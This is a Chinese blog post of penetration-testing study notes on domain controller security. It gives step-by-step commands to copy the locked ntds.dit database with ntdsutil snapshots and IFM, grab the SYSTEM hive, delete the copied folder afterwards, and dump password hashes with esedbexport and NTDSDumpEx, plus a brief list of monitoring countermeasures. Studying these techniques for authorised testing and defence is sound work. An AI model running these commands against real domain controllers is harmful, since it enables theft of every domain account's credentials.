内网渗透测试第六章——域控制器安全

最新推荐文章于 2024-04-28 16:03:21 发布
最新推荐文章于 2024-04-28 16:03:21 发布
阅读量581 收藏
点赞数
文章标签: windows 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43698674/article/details/120203700
版权

域控制器安全

在通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:Windows\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务,就可以获得文件的副本。

使用卷影拷贝服务提取ntds.dit

使用ntdsutil提取

ntdsutil.exe是一个为活动目录提供管理机制的命令行工具。使用ntdsutil.exe,可以维护和管理活动目录数据库、控制单个主机操作、创建应用程序目录分区、删除由未使用活动目录安装向导(DCPromo.exe)成功降级的域控制器留下的元数据等。该工具默认安装在域控制器上,可以在域控制器上直接操作,也可以通过域内机器在域控制器上远程操作。ntdsutil.exe支持的操作系统有Windows Server2003、Windows Server2008、Windows Server 2012。

创建快照

ntdsutil snapshot "activate instance ntds" create quit quit

image-20210908111313458

查看快照

ntdsutil snapshot "mount {快照ID}" quit quit

image-20210908111351142

打开文件管理可以看到,快照已经成功创建

image-20210908140735538

域控文件已经可以进行拷贝了

image-20210908140919239

删除快照

ntdsutil snapshot "unmount {快照ID}" “delete {快照ID}” quit quit

image-20210908141752780

查看系统中的所有快照

ntdsutil snapshot "List All" quit quit

image-20210908141941682

监控卷影拷贝服务的使用情况

  • 通过监控卷影拷贝服务的使用情况,可以及时发现攻击者在系统中进行的一些恶意操作。
  • 监控卷影拷贝服务及任何涉及活动目录数据库文件(ntds.dit)的可疑操作行为。
  • 监控System Event ID7036(卷影拷贝服务进入运行状态的标志)的可疑实例,以及创建vssvc.exe进程的事件。
  • 监控创建 diskshadow.exe及相关子进程的事件。
  • 监控客户端设备中的diskshadow.exe实例创建事件。除非业务需要,在Windows操作系统中不应该出现diskshadow.exe。如果发现,应立刻将其删除。
  • 通过日志监控新出现的逻辑驱动器映射事件。

使用ntdsutil的IFM创建卷影拷贝

在使用ntdsutil创建IFM时,需要进行生成快照、加载、将ntds.dit和计算机的SAM文件复制到目标文件夹中等操作。

在域控制器中以管理员模式打开命令行环境,输入命令

ntdsutil "ac i ntds" "ifm" "create full c:/test"q q

image-20210909143739802

ntds.dit复制到c:\test\Active Directory\文件夹下

dir "c:\test\Active Directory\"

image-20210909144241255

然后,将SYSTEMSECURITY两项复制到c:\test\registry\文件夹下

dir "c:\test\registry\"

image-20210909144404844

将ntds.dit 拖回本地后,在目标机器上将test文件夹删除。

rmdir /s/q test

导出ntds.dit中的散列值

使用esedbexport恢复ntds.dit

下载地址

https://github.com/libyal/libesedb/releases/download/20210424/libesedb-experimental-20210424.tar.gz

在kali下载libesedb

wget https://github.com/libyal/libesedb/releases/download/20210424/libesedb-experimental-20210424.tar.gz

image-20210908145400030

下载安装依赖环境

apt-get install autoconf automake autopoint libtool pkg-config

image-20210908145530315

解压

tar -xzvf libesedb-experimental-20210424.tar.gz

image-20210908145626941

配置

cd libesedb-20210424./configure

image-20210908145857294

编译

make

image-20210908145929668

安装

sudo make install

image-20210908150415271

配置

sudo ldconfig

image-20210908150039765

安装完成后会在/usr/local/bin目录下看到esedbexport程序

image-20210908152454393

ntds.dit文件上传到kali中,使用esedbexport进行恢复操作

esedbexport -m table ntds.dit

image-20210908153112774

提取成功,在同一目录下生成了文件夹

image-20210908153319314

使用NTDSDumpEx.exe导出散列值

使用NTDSDumpEx.exe可以导出散列值

下载地址

https://github.com/zcgonvh/NTDSDumpEx/releases/download/v0.3/NTDSDumpEx.zip

将ntds.dit、SYSTEM和NTDSDumpEx.exe放在同一目录下,运行程序

NTDSDumpEx.exe -d ntds.dit -s SYSTEM

image-20210909143146766

山己见
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透测试安全学习ppt
02-12
1.内网渗透测试 2.安全学习ppt
域控安全之域渗透
m0_59598029的博客
02-25 512
在通常情况下、即使拥有管理员权限,也无法读取域控制器中的C:\Windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为域控制器的。ntds.dit中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被Windows操作系统锁定的。
kali更新hash值命令_导出域内 ntds.dit 中的所有用户哈希值
weixin_39859394的博客
12-31 760
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 33篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更esedbexport 恢复 ntds.dit导出 ntds.dit用kali下载工具安装:#下载libesedbwget https://github.com/libyal/libesedb/releases/download/...
域控制器安全
qq_38675102的博客
01-04 349
域控制安全学习笔记
第6章域控制器安全
nigo134的博客
05-31 451
使用卷影拷贝服务提取ntds.dit 方法: 通过ntdsutil.exe提取ntds.dit 利用 vssadmin提取 ntds.dit 利用vssown.vbs脚本提取ntds.dit 使用ntdsutil的iFM创建卷影拷贝 使用diskshadow导出ntds.dit 通过ntdsutil.exe提取ntds.dit 在通常情况下,即使拥有管理员权限,也无法读取域控制器中的ndts.dit文件, 但是我们又非常想获得这个文件的内容,这个时候就需要使用windows本地卷影拷贝服务VS
详细解析关于域控制器安全保障
weixin_33781606的博客
05-11 523
2019独角兽企业重金招聘Python工程师标准>>> ...
pingcastle – Active Directory域控安全检测工具
Ms08067安全实验室
08-11 594
pingcastle简介:PingCastle旨在使用基于风险评估和成熟度框架的方法快速评估 Active Directory 安全级别。它的目标不是完美的评估,而是效率的妥协。Active Directory 正迅速成为任何大型公司的关键故障点,因为它既复杂又昂贵。可使用pingcastle对Active Directory安全性进行评估.委派漏洞检查示例在委派创建用户或计算机的权利时,可能会犯...
[内网安全]二.域实验环境搭建
PsgQ的博客
05-10 216
作为网络安全爱好者,对内网的渗透学习必不可少。因此从今天开始从零开始记录自己的内网学习过程,一方面是督促自己不断前行且学习新知识;另一方面是分享与读者,希望大家一起进步。这系列文章入门部分将参考徐焱老师的《内网安全攻防》这本书,并结合作者在安全牛课堂分享的学习讲解视频,且看且珍惜吧!督促自己完成每一个实验,把每一个细节搞懂,加油~ 文章目录0x00虚拟机准备下载地址安装文档0x01域环境搭建Windows 2012 R21.设置IP2.更改计算机名,修改为DC3.安装域控制器和DNS服务4.升级服务器,将服
安全策略和域控制器安全策略的区别
xiunai78的专栏
07-16 2765
安全策略和域控制器安全策略的区别 本文网址:http://bbs.bitscn.com/60806 复制 策略大体上分为4类,即本地策略,域策略,站点策略,ou策略,他们的作用顺序:local policy——〉site policy——〉domain policy——〉ou policy 本地安全策略是本地策略的一部分,在开机的时后就会被执行,无论你是否处于工作组模式
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南
内网渗透之域渗透.pdf
08-07
目录 工作组&域 域的渗透姿势 MS14-068 致谢
内网安全攻防-渗透测试指南 读书笔记.pdf
09-09
内网安全攻防-渗透测试指南 读书笔记
游走于内网之后——工控安全那些事儿.pdf
08-08
目录 1 工控安全之背景 2 工控安全之现状 3 工控安全之我见 4 工控安全之CTF
使用Mybatis映射时间 DateTime ==> LocalDateTime
qq_58341172的博客
04-25 390
此处有弊端,请移步下一篇……service:接口。
C语言:数据结构(双向链表)
weixin_66058866的博客
04-28 479
带头链表里的头节点,实际为“放哨的”,哨兵位节点不存储任何有效元素,只是站在这里“放哨的”,“哨兵位”存在的意义:遍历循环链表避免死循环。
循环双链表的操作
一个正在学习C/C++的博主
04-25 270
【代码】循环双链表的操作。
pve(Proxmox VE)安装i225v网卡驱动
qq_43158436的博客
04-27 427
我的网卡名是enp7s0,所以我是ifup enp7s0。内核版本就是 6.8.4-2-pve。执行命令安装pve-headers。下载完成后,传到pve节点上解压。在pve shell执行命令。使用unzip命令可进行解压。改为:也就是前面加#改为:也就是前面加#查看当前内核版本,如。执行命令进行安装驱动。
使用C++实现尾插式循环链表结构
AndrewYZWang的博客
04-24 507
总结起来,这段代码提供了一个简洁而实用的尾插式循环链表的实现,适用于需要高效进行顺序添加和按最近添加顺序删除元素的场景。用于创建新节点并将新节点插入到链表的尾部,即每次新增节点都会成为新的末尾节点。因此有必要实现一款属于自己的双向链表,这样在有需要的时候就能随时增加自己的特性,让链表更好的服务于其他模块。在使用C++实现链表时,我们需要实现两个主要的类:1. node节点类 ,2. 链接node节点的类。,该节点的前驱和后继均指向自身,形成一个空链表的“闭环”。,它作为链表中的实际节点实现。
Java设计模式 _结构型模式_过滤器模式
最新发布
weisian的博客
04-28 381
过滤器模式是对一组数据进行过滤,从而达到我们希望数据的设计模式。首先需要定义统一过滤方法,之后就是根据需要编写各种实现类,对需要的场景搭配不同的过滤器链路,让数据经过这些过滤器链路后获取我们需要数据的过程。过滤器,顾名思义,就是对一组数据进行过滤,从而最终获取到我们预期的数据。(3)、封装类中定义过滤器类的集合,添加过滤器到封装类中,定义和实现数据过滤的具体方法。(1)、定义过滤器的规范接口(生明接口,定义统一的过滤方法)。(2)、定义过滤器实现类,实现规范接口的过滤方法。运行结果可以看出实现了过滤效果。
内网安全攻防:渗透测试实战指南 pdf下载
07-29
对于内网安全攻防和渗透测试实战指南的PDF下载,首先需要明确渗透测试的目的是为了评估和测试内网安全性,找出可能存在的漏洞和风险,并提供相应的防御建议和措施。 在下载PDF之前,我们应该明确以下几个问题: 1. 有合法的授权和使用权限吗? 渗透测试是一项敏感且潜在危险的活动,需要事先与相关当事人保持沟通和达成共识,以确保测试合法、合规和有授权。因此,在下载之前,我们要确保自己拥有相应的合法权限。 2. 评估所需工具和技能 渗透测试需要一定的技术和工具支持。在下载之前,我们需要评估自己是否具备进行渗透测试所需要的技能和经验,并确认自己是否具备所需的工具和环境。 3. 错误使用导致的后果 渗透测试是一项高风险活动,如果错误使用或者测试方法不当,可能导致严重的后果,如业务中断、数据泄露等。因此,在下载之前,我们需要认识到这一点,并确保自己具备相应的安全意识和责任心。 总之,下载内网安全攻防和渗透测试实战指南的PDF之前,我们要确保自己拥有合法授权和权限,具备相应的技能和工具,以及清楚认识到错误使用可能导致的后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值